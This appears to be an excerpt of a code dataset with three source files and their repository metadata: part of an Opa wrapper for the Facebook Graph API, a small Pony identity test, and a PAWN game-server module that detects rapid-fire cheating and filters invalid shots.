generic_action("/{id}", data, token)
// Page section
/**
* update a Page's basic attributes or About section
*/
page_attributes(page_id, about:option(string), description:option(string), general_info:option(string),
website:option(string), phone:option(string), token) =
data = FbLib.params([{sopt=("about", about)},
{sopt=("description", description)},
{sopt=("general_info", general_info)},
{sopt=("website", website)},
{sopt=("phone", phone)}])
generic_action("/{page_id}", data, token)
/**
* set a cover photo for a Page
*/
page_cover_photo(page_id, cover:int, offset_y:option(int), no_feed_story:option(bool), token) =
data = FbLib.params([{ireq=("cover",cover)},{iopt=("offset_y",offset_y)},{bopt=("no_feed_story",no_feed_story)}])
generic_action("/{page_id}", data, token)
/**
* hide a Page post that is published by a non-admin user
*/
hide_page_post(page_id, is_hidden:bool, token) =
data = FbLib.params([{breq=("is_hidden",is_hidden)}])
generic_action("/{page_id}", data, token)
/**
* create an event for a page
*/
create_page_event(page_id, name:string, start_time:string,
end_time:option(string), description:option(string),
location:option(string), location_id:option(string), token) =
data = FbLib.params([{sreq=("name",name)},{sreq=("start_time",start_time)},
{sopt=("end_time",end_time)},{sopt=("description",description)},
{sopt=("location",location)},{sopt=("location_id",location_id)}])
generic_action("/{page_id}/events", data, token)
/**
* edit an event for a page
*/
edit_page_event(event_id, name:option(string), start_time:option(string),
end_time:option(string), description:option(string),
location:option(string), location_id:option(string), token) =
data = FbLib.params([{sopt=("name",name)},{sopt=("start_time",start_time)},
{sopt=("end_time",end_time)},{sopt=("description",description)},
{sopt=("location",location)},{sopt=("location_id",location_id)}])
generic_action("/{event_id}", data, token)
/**
* post a link on a Page
*/
create_page_link(page_id, link:string, message:option(string),
published:option(bool), scheduled_publish_time:option(string), token) =
data = FbLib.params([{sreq=("link",link)},{sopt=("message",message)},
{bopt=("published",published)},{sopt=("scheduled_publish_time",scheduled_publish_time)}])
generic_action("/{page_id}/feed", data, token)
/**
* create a note on a Page
*/
create_page_note(page_id, subject:string, message:string, token) =
data = FbLib.params([{sreq=("subject",subject)},{sreq=("message",message)}])
generic_action("/{page_id}/notes", data, token)
/**
* create a note on a Page
*/
post_page_photos(page_id, filename:string, content_type:string, source:string,
message:option(string), targeting:option(RPC.Json.json),
feed_targeting:option(RPC.Json.json),
published:option(bool), scheduled_publish_time:option(string),
token) =
forms = FbLib.forms([{file=("source",filename,content_type,source)},
{sopt=("message",message)},{jopt=("targeting",(j->j),targeting)},
{jopt=("feed_targeting",(j->j),feed_targeting)},
{bopt=("published",published)},{sopt=("scheduled_publish_time",scheduled_publish_time)}])
generic_action_multi("/{page_id}/photos", forms, token)
/**
* create a post on a Page
*/
create_page_post(page_id, p:Facebook.post,
targeting:option(RPC.Json.json), published:option(bool), scheduled_publish_time:option(string),
token) =
data = FbLib.params([{sopt=("message",p.message)},{sopt=("link",p.link)},
{sopt=("picture",p.picture)},
{sopt=("name",p.name)},
{sopt=("caption",p.caption)},
{sopt=("description",p.description)},
{aopt=("actions",FbLib.feed_link_to_json,p.actions)},
{jopt=("targeting",(j->j),targeting)},
{bopt=("published",published)},
{sopt=("scheduled_publish_time",scheduled_publish_time)}])
generic_action("/{page_id}/feed", data, token)
/**
* post a question on behalf of the Page
*/
create_page_question(page_id, question:string,
options:list(string), allow_new_options:option(bool),
published:option(bool), scheduled_publish_time:option(string),
token) =
data = FbLib.params([{sreq=("question",question)},
{aopt=("options",(s->{String=s}),options)},
{bopt=("allow_new_options",allow_new_options)},
{bopt=("published",published)},
{sopt=("scheduled_publish_time",scheduled_publish_time)}])
generic_action("/{page_id}/questions", data, token)
/**
* add a milestone
*/
create_page_milestone(page_id, title:string, description:string, start_time:string, token) =
data = FbLib.params([{sreq=("title",title)},{sreq=("description",description)},{sreq=("start_time",start_time)}])
generic_action("/{page_id}/milestones", data, token)
/**
* create an Offer for a page
*/
create_page_offer(page_id, o:FbGraph.offer, token) =
data = FbLib.params([{sreq=("title",o.title)},
{sreq=("expiration_time",o.expiration_time)},
{sopt=("terms",o.terms)},
{sopt=("image_url",o.image_url)},
{sopt=("image",o.image)},
{iopt=("claim_limit",o.claim_limit)},
{sopt=("coupon_type",o.coupon_type)},
{sopt=("qrcode",o.qrcode)},
{sopt=("barcode",o.barcode)},
{sopt=("redemption_link",o.redemption_link)},
{sopt=("redemption_code",o.redemption_code)}])
generic_action("/{page_id}/offers", data, token)
/**
* reply to a user's message
*/
reply(id, message:string, token) =
data = FbLib.params([{sreq=("message",message)}])
generic_action("/{id}/messages", data, token)
string_of_setting(s:FbGraph.setting) =
match s with
| {users_can_post} -> "USERS_CAN_POST"
| {users_can_post_photos} -> "USERS_CAN_POST_PHOTOS"
| {users_can_tag_photos} -> "USERS_CAN_TAG_PHOTOS"
| {users_can_post_videos} -> "USERS_CAN_POST_VIDEOS"
/**
* change whether users can post to the Wall of a page
*/
settings(id, setting:FbGraph.setting, value:bool, token) =
data = FbLib.params([{creq=("setting",string_of_setting,setting)},{breq=("value",value)}])
generic_action("/{id}/settings", data, token)
/**
* post a status message on a Page
*/
create_page_status(id, message:string, published:option(bool), scheduled_publish_time:option(string), token) =
data = FbLib.params([{sreq=("message",message)},
{bopt=("published",published)},
{sopt=("scheduled_publish_time",scheduled_publish_time)}])
generic_action("/{id}/feed", data, token)
/**
* publish a video on a Page
*/
create_page_video(page_id, filename:string, content_type:string, source:string,
title:option(string), description:option(string),
published:option(bool), scheduled_publish_time:option(string),
token) =
forms = FbLib.forms([{file=("source",filename,content_type,source)},
{sopt=("title",title)},{sopt=("description",description)},
{bopt=("published",published)},{sopt=("scheduled_publish_time",scheduled_publish_time)}])
generic_action_multi_base(video_url, "/{page_id}/videos", forms, token)
/**
* install a profile_tab at the end of the current list of installed tabs for a page
*/
create_page_tab(page_id, app_id:string, token) =
data = FbLib.params([{sreq=("app_id",app_id)}])
generic_action("/{page_id}/tabs", data, token)
/**
* update an installed profile_tab for a page
*/
update_page_tab(page_id, tab_id,
position:option(int), custom_name:option(string),
is_non_connection_landing_tab:option(bool), custom_image_url:option(string),
custom_image:option(string),
token) =
data = FbLib.params([{iopt=("position",position)},
{sopt=("custom_name",custom_name)},
{bopt=("is_non_connection_landing_tab",is_non_connection_landing_tab)},
{sopt=("custom_image_url",custom_image_url)},
{sopt=("custom_image",custom_image)}])
generic_action("/{page_id}/tabs/{tab_id}", data, token)
/**
* block a user from posting content to your page
*/
block(page_id, users:list(string), token) =
data = FbLib.params([{lopt=("users",(s->s),users)}])
generic_action("/{page_id}/blocked", data, token)
/**
* create a tag on the photo
*/
create_photo_tag(photo_id, to:option(string), tag_text:option(string), x:option(int), y:option(int), token) =
if Option.is_none(to) && Option.is_none(tag_text)
then {error=Facebook.make_error("create_photo_tag","Must have either 'to' or 'tag_text'")}
else
data = FbLib.params([{sopt=("to",to)},
{sopt=("tag_text",tag_text)},
{iopt=("x",x)},
{iopt=("y",y)}])
generic_action("/{photo_id}/tags", data, token)
/**
* update the position of a tag for a particular user in the photo
*/
update_photo_tag(photo_id, to:string, x:option(int), y:option(int), token) =
data = FbLib.params([{sreq=("to",to)},
{iopt=("x",x)},
{iopt=("y",y)}])
generic_action("/{photo_id}/tags", data, token)
/**
* post a option to the question
*/
create_question_option(questions_id, option:option(string), token) =
data = FbLib.params([{sopt=("option",option)}])
generic_action("/{questions_id}/options", data, token)
/**
* create an album for a user
*/
create_user_album(profile_id, name:string, message:option(string), privacy:option(RPC.Json.json), token) =
data = FbLib.params([{sreq=("name",name)},
{sopt=("message",message)},
{jopt=("privacy",(j->j),privacy)}])
generic_action("/{profile_id}/albums", data, token)
/**
* post a apprequest for a user
*/
create_user_apprequest(user_id, message:string, data:option(string), token) =
reqdata = FbLib.params([{sreq=("message",message)},
{sopt=("data",data)}])
generic_action("/{user_id}/apprequests", reqdata, token)
/**
* checkin a user
*/
create_user_checkin(profile_id, place:string, coordinates:string,
tags:list(string), message:option(string), link:option(string), picture:option(string),
token) =
data = FbLib.params([{sreq=("place",place)},
{sreq=("coordinates",coordinates)},
{lopt=("tags",(s->s),tags)},
{sopt=("message",message)},
{sopt=("link",link)},
{sopt=("picture",picture)}])
generic_action("/{profile_id}/checkins", data, token)
string_of_privacy_type(pt:FbGraph.privacy_type) =
match pt with
| {open} -> "OPEN"
| {secret} -> "SECRET"
| {friends} -> "FRIENDS"
/**
* create an event for a user
*/
create_user_event(profile_id, name:string, start_time:Date.date,
end_time:option(Date.date), description:option(string), location:option(string), location_id:option(string),
privacy_type:option(FbGraph.privacy_type),
token) =
data = FbLib.params([{sreq=("name",name)},
{dreq=("start_time",start_time)},
{dopt=("end_time",end_time)},
{sopt=("description",description)},
{sopt=("location",location)},
{sopt=("location_id",location_id)},
{copt=("privacy_type",string_of_privacy_type,privacy_type)}])
generic_action("/{profile_id}/events", data, token)
/**
* update an event for a user
*/
update_user_event(event_id, name:option(string), start_time:option(Date.date),
end_time:option(Date.date), description:option(string), location:option(string), location_id:option(string),
privacy_type:option(FbGraph.privacy_type),
token) =
data = FbLib.params([{sopt=("name",name)},
{dopt=("start_time",start_time)},
{dopt=("end_time",end_time)},
{sopt=("description",description)},
{sopt=("location",location)},
{sopt=("location_id",location_id)},
{copt=("privacy_type",string_of_privacy_type,privacy_type)}])
generic_action("/{event_id}", data, token)
/**
* create a friend list for a user
*/
create_user_friendlist(profile_id, name:string, token) =
data = FbLib.params([{sreq=("name",name)}])
generic_action("/{profile_id}/friendlists", data, token)
/**
* post a link on the user's behalf
*/
create_user_link(profile_id, link:string, message:option(string), token) =
data = FbLib.params([{sreq=("link",link)},{sopt=("message",message)}])
generic_action("/{profile_id}/feed", data, token)
/**
* create a note on behalf of the user
*/
create_user_note(profile_id, subject:string, message:string, token) =
data = FbLib.params([{sreq=("subject",subject)},{sreq=("message",message)}])
generic_action("/{profile_id}/notes", data, token)
/**
* send app notifications to users of your app
*/
create_user_notification(user_id, template:string, href:string, token) =
data = FbLib.params([{sreq=("template",template)},{sreq=("href",href)}])
generic_action("/{user_id}/notifications", data, token)
/**
* post photos to a user's Wall on their behalf
*/
post_user_photos(profile_id, filename:string, content_type:string, source:string,
message:option(string), place:option(string),
no_story:option(bool),
token) =
forms = FbLib.forms([{file=("source",filename,content_type,source)},
{sopt=("message",message)},
{sopt=("place",place)},
{bopt=("no_story",no_story)}])
generic_action_multi("/{profile_id}/photos", forms, token)
/**
* post a question on behalf of the user
*/
create_user_question(profile_id, question:string,
options:list(string), allow_new_options:option(bool),
token) =
data = FbLib.params([{sreq=("question",question)},
{aopt=("options",(s->{String=s}),options)},
{bopt=("allow_new_options",allow_new_options)}])
generic_action("/{profile_id}/questions", data, token)
/**
* publish a video on behalf of a user
*/
create_user_video(profile_id, filename:string, content_type:string, source:string,
title:option(string), description:option(string),
token) =
forms = FbLib.forms([{file=("source",filename,content_type,source)},
{sopt=("title",title)},
{sopt=("description",description)}])
generic_action_multi("/{profile_id}/videos", forms, token)
/**
* post a score for a user
*/
create_user_score(user_id, score:int, token) =
data = FbLib.params([{ireq=("score",score)}])
generic_action("/{user_id}/scores", data, token)
/**
* Post a new element in user's feed
* You can control the target of the feed with [feed.to].
*/
feed(feed:Facebook.feed, token) =
to = if feed.to == "" then "me" else feed.to
data = FbLib.feed_to_data(feed, false)
generic_action("/{to}/feed", data, token)
/**
* Post a comment on [object_id] element on behalf of logged used
*/
comment(object_id, message, token) =
data = [("message", message)]
generic_action("/{object_id}/comments", data, token)
/**
* Like [object_id] element on behalf of logger user (works with various types of id)
*/
like(object_id, token) =
generic_action("/{object_id}/likes", [], token)
/**
* Post a note
*/
note(profile_id, subject, message, token) =
data = [("subject", subject), ("message", message)]
generic_action("/{profile_id}/notes", data, token)
/**
* Create a simple link with only the [link] field set
*/
default_link(link) = {
to = ""
message = ""
link = link
picture = ""
name = ""
caption = ""
description = ""
} : FbGraph.link
/**
* Post a link
*/
link(link:FbGraph.link, token) =
to = if link.to == "" then "me" else link.to
data = FbGraph_to_string.link_to_data(link)
generic_action("/{to}/links", data, token)
empty_place = {
street = ""
city = ""
state = ""
zip = ""
country = ""
latitude = 0.
longitude = 0.
} : FbGraph.event_place
/**
* Create a simple event with only the [name] field set
*/
simple_event(name) = {
name = name
description = ""
start_time = Date.now()
end_time = Date.shift_forward(Date.now(),Duration.h(1))
location = ""
place = empty_place
privacy = { OPEN }
} : FbGraph.event
/**
* Post an event
*/
event(profile_id, event:FbGraph.event, token) =
data = FbGraph_to_string.event_to_data(event)
generic_action("/{profile_id}/events", data, token)
/**
* Report current user as attending an event
*/
rsvp_attending(event_id, token) =
generic_action("/{event_id}/attending", [], token)
/**
* Report current user as maybe attending an event
*/
rsvp_maybe(event_id, token) =
generic_action("/{event_id}/maybe", [], token)
/**
* Report current user as not attending an event
*/
rsvp_declined(event_id, token) =
generic_action("/{event_id}/declined", [], token)
/**
* Create a simple album with only the [name] field set
*/
simple_album(name) = {
name = name
message = ""
location = ""
link = ""
}
/**
* Post an album
*/
album(profile_id, album, token) =
data = FbGraph_to_string.album_to_data(album)
generic_action("/{profile_id}/albums", data, token)
/* NOTE: Publishing a Checkin object is deprecated in favor of creating a Post with a location attached.
checkins(profile_id, checkin)
*/
}}
Read = {{
prepare_object_option(o:FbGraph.Read.object_options) =
FbLib.params([{nes=("access_token", o.token)},
{lopt=("fields", (s->s), o.fields)},
{nes=("metadata", (if o.metadata then "1" else ""))}])
empty_metadata = {
obj_type = ""
connections = []
fields = []
} : FbGraph.Read.metadata
@private extract_metadata(l:list((string,RPC.Json.json))) =
aux(e:RPC.Json.json,acc:list((string,string))) =
match e with
| {Record=r} ->
name = FbLib.fetch_json_string("name", r)
if name == "" then acc
else List.add((name, FbLib.fetch_json_string("description", r)), acc)
| _ -> acc
match List.assoc("metadata", l) with
| {some={Record=m}} ->
t = FbLib.fetch_json_string("type", m)
c = match List.assoc("connections", m) with
| {some={Record=m}} ->
aux((n,v)) = (n,FbLib.get_json_string(v))
List.map(aux, m)
| _ -> []
end
f = match List.assoc("fields", m) with
| {some={List=l}} ->
List.fold(aux,l,[])
| _ -> []
end
ll = List.filter(((a,_)->a!="metadata"),l)
(build_data(ll), { obj_type = t
connections = c
fields = f })
| _ -> (build_data(l), empty_metadata)
default_object = {
token = ""
fields = []
metadata = false
} : FbGraph.Read.object_options
/**
* Get information about the object with given id, results depends of options
* If no token is provided, only public information is available. Else,
* fields available will vary according to the permissions of your
* application.
* In case of success, if [options.metadata] is true, the result will be
* [object_metadata]. Else it will be [object].
*/
object(id, options) : FbGraph.Read.object =
data = prepare_object_option(options)
match FbLib.fb_get(graph_url, "/{id}", data) with
| {none} -> { error = Facebook.network_error }
| {some=content} -> process_object(options.metadata, content)
process_object(metadata, content) : FbGraph.Read.object =
match Json.of_string(content) with
| {none} -> { error = Facebook.parse_error(content) }
| {some={Record=r}} ->
on_ok(x:list((string,RPC.Json.json))) =
if metadata
then { object_metadata = extract_metadata(x) }
else { object = build_data(x) }
check_for_error(r, on_ok, (y -> { error = y }))
| {some={Bool=b}} ->
if b
then { error = Facebook.data_error }
else { error = Facebook.access_denied }
| _ -> { error = Facebook.data_error }
end
/**
* Perform a standard get object call but process the reply for a 302 Redirect response.
*/
redirect(id, options) =
data = prepare_object_option(options)
FbLib.fb_get_redirect(graph_url, "/{id}", data)
/**
* Return the raw content of a request.
* Eg. profile pictures return jpeg data.
*/
raw(id, options) : FbGraph.Read.raw =
data = prepare_object_option(options)
match FbLib.fb_get_ct(graph_url, "/{id}", data) with
| {none} -> { error = Facebook.network_error }
| {some=(content_type,location,content)} -> ~{ content; location; content_type }
/**
* Get information about objects with given ids, Results depends of options
* If no token is provided, only public information is available. Else,
* fields available will vary according to the permissions of your
* application.
* Asked objects do not have to be of the same type. However, if
* [options.fields] is set, *all fields* must be in *all objects* or the
* request will fail.
* In case of success, if [options.metadata] is true, the result will be
* [objects_metadata]. Else it will be [objects].
*/
multiple_objects(ids, options) : FbGraph.Read.objects =
if ids == [] then { error = Facebook.data_error }
else
data = prepare_object_option(options)
|> List.add(("ids",String.concat(",",ids)),_)
match FbLib.fb_get(graph_url, "", data) with
| {none} -> { error = Facebook.network_error }
| {some=r} ->
match Json.of_string(r) with
| {none} -> { error = Facebook.parse_error(r) }
| {some={Record=r}} ->
aux((k,v),acc) = match v with
| {Record=r} -> List.add((k,r), acc)
| _ -> acc
on_ok(x:list((string,RPC.Json.json))) =
subres = List.fold(aux,x,[])
if options.metadata then
aux((k,v)) =
(w,m) = extract_metadata(v)
(k,w,m)
{ objects_metadata = List.map(aux,subres) }
else
aux((k,v)) = (k, build_data(v))
{ objects = List.map(aux,subres) }
check_for_error(r, on_ok, (x -> { error = x }))
| _ -> { error = Facebook.data_error }
end
/**
* Get data about one connection of an element
* All connections available for an element are available in the
* metadata of this elelement
*/
connection(id, connection, token, paging) : FbGraph.data_paging_res =
data = prepare_paging(paging)
|> FbLib.add_if_filled("access_token", token, _)
match FbLib.fb_get(graph_url, "/{id}/{connection}", data) with
| {none} -> { error = Facebook.network_error }
| {some=r} -> build_data_paging(r)
/**
* Get all permissions available for current app with current user
*/
permissions(user_id, token) : list(Facebook.permission) =
match connection(user_id, "permissions", token, default_paging) with
| {error=_} -> []
| {success=s} ->
if s.data == [] then []
else
aux((p,_),acc) =
match Facebook.permission_of_string(p) with
| {some=p} -> List.add(p,acc)
| {none} -> acc
List.fold(aux,List.head(s.data).data,[])
/**
* Simply returns an url to given object with given size.
*/
picture_url(id, size) : string =
data = [("type",FbGraph_to_string.pic_size_to_string(size))]
FbLib.generic_build_path("{graph_url}/{id}/picture", data)
/**
* Performs a read on [app_id] with added fields="migrations".
*/
migrations(app_id, options) = object(app_id, {options with fields=List.add("migrations",options.fields)})
/**
* Performs a read on [app_id] with added fields="restrictions".
*/
restrictions(app_id, options) = object(app_id, {options with fields=List.add("restrictions",options.fields)})
/**
* Returns a list of properties for an app.
*/
properties(app_id, options, properties:list(Facebook.property)) =
props = String.concat(",",List.map(Facebook.string_of_property,properties))
object(app_id, {options with fields=List.add(props,options.fields)})
banned(app_id, options) = object("{app_id}/banned", options)
is_banned(app_id, user_id, options) = object("{app_id}/banned/{user_id}", options)
payment_currency(app_id, options) = object("{app_id}/payment_currencies", options)
roles(app_id, options) = object("{app_id}/roles", options)
scores(app_id, options) = object("{app_id}/scores", options)
invited(event_id, options) = object("{event_id}/invited", options)
is_invited(event_id, user_id, options) = object("{event_id}/invited/{user_id}", options)
attending(event_id, options) = object("{event_id}/attending", options)
is_attending(event_id, user_id, options) = object("{event_id}/attending/{user_id}", options)
maybe(event_id, options) = object("{event_id}/maybe", options)
is_maybe(event_id, user_id, options) = object("{event_id}/maybe/{user_id}", options)
declined(event_id, options) = object("{event_id}/declined", options)
is_declined(event_id, user_id, options) = object("{event_id}/declined/{user_id}", options)
noreply(event_id, options) = object("{event_id}/noreply", options)
photos(id, options) = object("{id}/photos", options)
picture(id, options) = redirect("{id}/photos", options)
friendlist = object
promotable_posts(page_id, options) = object("{page_id}/promotable_posts", options)
milestones(id, options) = object("{id}/milestones", options)
conversations(id, options) = object("{id}/conversations", options)
tabs(id, options) = object("{id}/tabs", options)
is_app_installed(page_id, app_id, options) = object("{page_id}/tabs/{app_id}", options)
is_admin(page_id, user_id, options) = object("{page_id}/admins/{user_id}", options)
blocked(page_id, options) = object("{page_id}/blocked", options)
is_blocked(page_id, user_id, options) = object("{page_id}/blocked/{user_id}", options)
questions(id, options) = object("{id}/questions", options)
question_options(id, question_id, options) = object("{id}/{question_id}/options", options)
apprequests(user_id, options) = object("{user_id}/apprequests", options)
friends(profile_id, options) = object("{profile_id}/friends", options)
is_friend(profile_id, user_id, options) = object("{profile_id}/friends/{user_id}", options)
friendrequests(user_id, options) = object("{user_id}/friendrequests", options)
likes(profile_id, options) = object("{profile_id}/likes", options)
likespage(profile_id, page_id, options) = object("{profile_id}/likes/{page_id}", options)
mutualfriends(profile_id, options) = object("{profile_id}/mutualfriends", options)
permissions_raw(user_id, options) = object("{user_id}/permissions", options)
subscribedto(user_id, options) = object("{user_id}/subscribedto", options)
subscribers(user_id, options) = object("{user_id}/subscribers", options)
}}
Search = {{
empty_query_res = {
data = []
paging = no_paging
}
/**
* Make a search query for [query] among elements of type [stype]
* Some types of requests require a valid token.
*/
query(query, stype, token, paging) : FbGraph.data_paging_res =
data = prepare_paging(paging)
|> List.append(FbGraph_to_string.search_query_type_to_data(stype),_)
|> List.append([("q",query)],_)
|> FbLib.add_if_filled("access_token", token, _)
match FbLib.fb_get(graph_url, "/search", data) with
| {none} -> { error = Facebook.network_error }
| {some=r} -> build_data_paging(r)
/**
* Make a search for [query] in user's home feed.
*/
home_query(query, token, paging) : FbGraph.data_paging_res =
data = prepare_paging(paging)
|> List.append([("q",query)],_)
|> FbLib.add_if_filled("access_token", token, _)
match FbLib.fb_get(graph_url, "/me/home", data) with
| {none} -> { error = Facebook.network_error }
| {some=r} -> build_data_paging(r)
}}
Fql = {{
/**
* Make a FQL Query
*/
query(query:string, token) =
data = [("access_token", token), ("q", query)]
match FbLib.fb_get(graph_url, "/fql", data) with
| {none} -> { error = Facebook.network_error }
| {some=r} ->
match Json.of_string(r) with
| {none} -> { error = Facebook.parse_error(r) }
| {some={Record=r}} ->
on_ok(x:list((string,RPC.Json.json))) =
match List.assoc("data", x) with
| {none} -> { error = Facebook.data_error }
| {some=d} -> { success = d }
end
check_for_error(r, on_ok, (y -> { error = y }))
| _ -> { error = Facebook.data_error }
end
}}
Batch = {{
// TODO: uploading binary data in a batch, see http://developers.facebook.com/docs/reference/api/batch/
@private string_of_method(m:FbGraph.method) : string =
match m with
| {get} -> "GET"
| {put} -> "PUT"
| {post} -> "POST"
| {delete} -> "DELETE"
@private header2j(h:FbGraph.header) : RPC.Json.json =
{Record=[("name",{String=h.name}),("value",{String=h.value})]}
@private br2j(br:FbGraph.batch_request) : RPC.Json.json =
{Record=List.flatten([[("method",{String=string_of_method(br.method)}),
("relative_url",{String=br.relative_url})],
if Option.is_none(br.name) then [] else [("name",{String=Option.get(br.name)})],
if br.headers == [] then [] else [("headers",{List=List.map(header2j,br.headers)})],
if Option.is_none(br.body) then [] else [("body",{String=Option.get(br.body)})]
])}
@private get_header(h:RPC.Json.json) : option(FbGraph.header) =
match h with
| {Record=r} ->
match (List.assoc("name",r), List.assoc("value",r)) with
| ({some={String=name}},{some={String=value}}) -> {some=~{name value}}
| _ -> none
end
| _ -> none
@private get_br(req:FbGraph.batch_request, br:RPC.Json.json) : FbGraph.batch_result =
match br with
| {Record=r} ->
code = match List.assoc("code",r) with {some={Int=code}} -> code | _ -> -1 end
headers = match List.assoc("headers",r) with {some={List=l}} -> List.filter_map(get_header,l) | _ -> [] end
body = match List.assoc("body",r) with | {some={String=s}} -> {some=s} | _ -> none end
~{typ=req.typ; metadata=req.metadata; code; headers; body}
| _ -> {error=Facebook.make_error("get batch result","bad data: {br}")}
/**
* Perform a batch call on the given list of requests (max: 50 requests).
* Returns the raw batch objects, use [process_batch_result(s)] to get the
* usual return processing on results.
*/
batch(requests:FbGraph.batch_requests, token) : FbGraph.batch_results =
if requests == [] || List.length(requests) > 50
then {error=Facebook.data_error}
else
path = API_libs.form_urlencode([("access_token",token)])
batch = "batch={Json.serialize({List=List.map(br2j,requests)})}"
match FbLib.fb_post_raw(graph_url, "/?{path}", batch) with
| {none} -> {error=Facebook.network_error}
| {some=r} ->
match Json.of_string(r) with
| {some={List=l}} ->
if List.length(requests) != List.length(l)
then {error=Facebook.make_error("batch","Number of replies doesn't match number of requests")}
else {batch_results=List.map2(get_br,requests,l)}
| {some={Record=r}} ->
match List.assoc("error",r) with
| {some={Record=e}} ->
match (List.assoc("message",e),List.assoc("type",e)) with
| ({some={String=message}},{some={String=typ}}) ->
{error=Facebook.make_error(typ,message)}
| _ -> {error=Facebook.make_error("bad JSON","{{Record=e}}")}
end
| _ -> {error=Facebook.make_error("bad JSON","{{Record=r}}")}
end
| {some=j} -> {error=Facebook.make_error("batch","bad JSON: {j}")}
| {none} -> {error=Facebook.parse_error(r)}
end
/**
* Make a batch request element from a standard object read call.
* The resultant batch request will be a GET to the implied url.
* Unnamed, use something like: [\{object(id,options) with ~name\}]
*/
object(id, options) : FbGraph.batch_request =
data = Read.prepare_object_option(options)
relative_url = FbLib.generic_build_path("{id}", data)
{typ={object}; name=none; metadata=options.metadata; method={get}; ~relative_url; headers=[]; body=none}
/**
* Process generic result from batch operation.
* Note that we don't support multiple_objects here, seems redundant in a batch call.
*/
process_batch_result(br:FbGraph.batch_result) : FbGraph.result =
match br with
| {~error} -> {~error}
| {typ={object}; ~metadata; ~body; ...} ->
match body with
| {none} -> {error=Facebook.make_error("process_batch_result","no content")}
| {some=r} ->
match Read.process_object(metadata, r) with
| {~error} -> {~error}
| object -> {~object}
end
end
| {typ={post}; ~body; ...} ->
match body with
| {none} -> {error=Facebook.make_error("process_batch_result","no content")}
| {some=r} ->
match process_post(r) with
| {~error} -> {~error}
| post -> {~post}
end
end
| {typ={delete}; ~body; ...} ->
match body with
| {none} -> {error=Facebook.make_error("process_batch_result","no content")}
| {some=r} ->
match process_post(r) with
| {~error} -> {~error}
| delete -> {~delete}
end
end
/**
* Process return value from Read.batch.
*/
process_batch_results(brs:FbGraph.batch_results) : FbGraph.processed_batch_results =
match brs with
| {~batch_results} -> {processed_batch_results=List.map(process_batch_result,batch_results)}
| {~error} -> {~error}
}}
}}
/* to_string functions */
@private FbGraph_to_string = {{
search_query_type_to_data(t) =
match t:FbGraph.Search.query_type with
{ post } -> [("type","post")]
{ user } -> [("type","user")]
{ page } -> [("type","page")]
{ event } -> [("type","event")]
{ group } -> [("type","group")]
{ place=p } -> [("type","event"), ("distance","{p.distance}"),
("center","{p.latitude},{p.longitude}")]
pic_size_to_string(s) =
match s:FbGraph.Read.pic_size with
{ square } -> "square"
{ small } -> "small"
{ normal } -> "normal"
{ large } -> "large"
privacy_to_string(p) =
match p:FbGraph.event_privacy with
{ OPEN } -> "OPEN"
{ CLOSED } -> "CLOSED"
{ SECRET } -> "SECRET"
place_to_string(p:FbGraph.event_place) =
if p == FbGraph.Post.empty_place then ""
else
f(n,v) = (n, {String=v}:RPC.Json.json)
g(n,v) = (n, {Float=v}:RPC.Json.json)
{ Record=[ f("street",p.street), f("city",p.city),
f("state",p.state), f("zip",p.zip),
f("country",p.country), g("latitude",p.latitude),
g("longitude",p.longitude) ]
}:RPC.Json.json |> Json.serialize
link_to_data(link) =
FbLib.params([{nes=("message", link.message)},
{nes=("link", link.link)},
{nes=("picture", link.picture)},
{nes=("name", link.name)},
{nes=("caption", link.caption)},
{nes=("description", link.description)}])
event_to_data(e:FbGraph.event) =
FbLib.params([{sreq=("name", e.name)},
{sreq=("venue", place_to_string(e.place))},
{sreq=("privacy", privacy_to_string(e.privacy))},
{nes=("description", e.description)},
{nes=("location", e.location)},
{dreq=("start_time", e.start_time)},
{dreq=("end_time", e.end_time)}])
album_to_data(a:FbGraph.album) =
FbLib.params([{sreq=("name", a.name)},
{nes=("message", a.message)},
{nes=("location", a.location)},
{nes=("link", a.link)}])
photo_to_form(p:FbGraph.photo) =
FbLib.forms([{file=("source",p.filename,p.content_type,p.source)},
{nes=("message", p.message)}])
}}
| Opa | 5 | Machiaweliczny/oppailang | lib/stdlib/apis/facebook/graph/graph.opa | [
"MIT"
] |
use "lib:identity-digestof-object-additional"
use @ptr_to_int[USize](env: Env)
use @pony_exitcode[None](code: I32)
actor Main
new create(env: Env) =>
let dg = digestof env
if dg == @ptr_to_int(env) then
@pony_exitcode(1)
end
| Pony | 2 | rtpax/ponyc | test/libponyc-run/identity-digestof-object/main.pony | [
"BSD-2-Clause"
] |
/*
* Irresistible Gaming (c) 2018
* Developed by Lorenc
* Module: anticheat\rapidfire.pwn
* Purpose: rapid fire detection as well as invalid bullet filtering
*/
/* ** Includes ** */
#include < YSI\y_hooks >
/* ** Variables ** */
static stock
p_RapidFireTickCount [ MAX_PLAYERS ],
p_RapidFireShots [ MAX_PLAYERS char ]
;
/* ** Hooks ** */
hook OnPlayerDisconnect( playerid, reason ) {
if ( 0 <= playerid < MAX_PLAYERS ) {
p_RapidFireShots{ playerid } = 0;
}
return 1;
}
hook OnPlayerWeaponShot( playerid, weaponid, hittype, hitid, Float: fX, Float: fY, Float: fZ )
{
new
keys, ud, lr;
GetPlayerKeys( playerid, keys, ud, lr );
// Simple. But effective. Anti-Shooting Hacks.
if ( ! ( keys & KEY_FIRE ) ) {
return Y_HOOKS_BREAK_RETURN_0;
}
// Invalid weapon id
if ( ! ( 22 <= weaponid <= 34 ) && weaponid != 38 ) {
return Y_HOOKS_BREAK_RETURN_0;
}
// Invalid hit (very far offset from player)
if ( hittype == BULLET_HIT_TYPE_PLAYER && ( ( fX >= 10.0 || fX <= -10.0 ) || ( fY >= 10.0 || fY <= -10.0 ) || ( fZ >= 10.0 || fZ <= -10.0 ) ) ) {
return Y_HOOKS_BREAK_RETURN_0;
}
// Anti-Rapid Fire
if ( ! p_RapidFireTickCount[ playerid ] ) p_RapidFireTickCount[ playerid ] = GetTickCount( );
else
{
new
iInterval = GetTickCount( ) - p_RapidFireTickCount[ playerid ];
if ( ( iInterval <= 35 && ( weaponid != 38 && weaponid != 28 && weaponid != 32 ) ) || ( iInterval <= 370 && ( weaponid == 34 || weaponid == 33 ) ) )
{
if ( p_RapidFireShots{ playerid } ++ >= 5 ) {
CallLocalFunction( "OnPlayerCheatDetected", "ddd", playerid, CHEAT_TYPE_RAPIDFIRE, 0 );
return Y_HOOKS_BREAK_RETURN_0;
}
}
else
{
p_RapidFireShots{ playerid } = 0;
}
p_RapidFireTickCount[ playerid ] = GetTickCount( );
}
return 1;
}
| PAWN | 4 | omcho420/gta-open | gamemodes/core/anti-cheat/rapidfire.pwn | [
"Apache-2.0"
] |
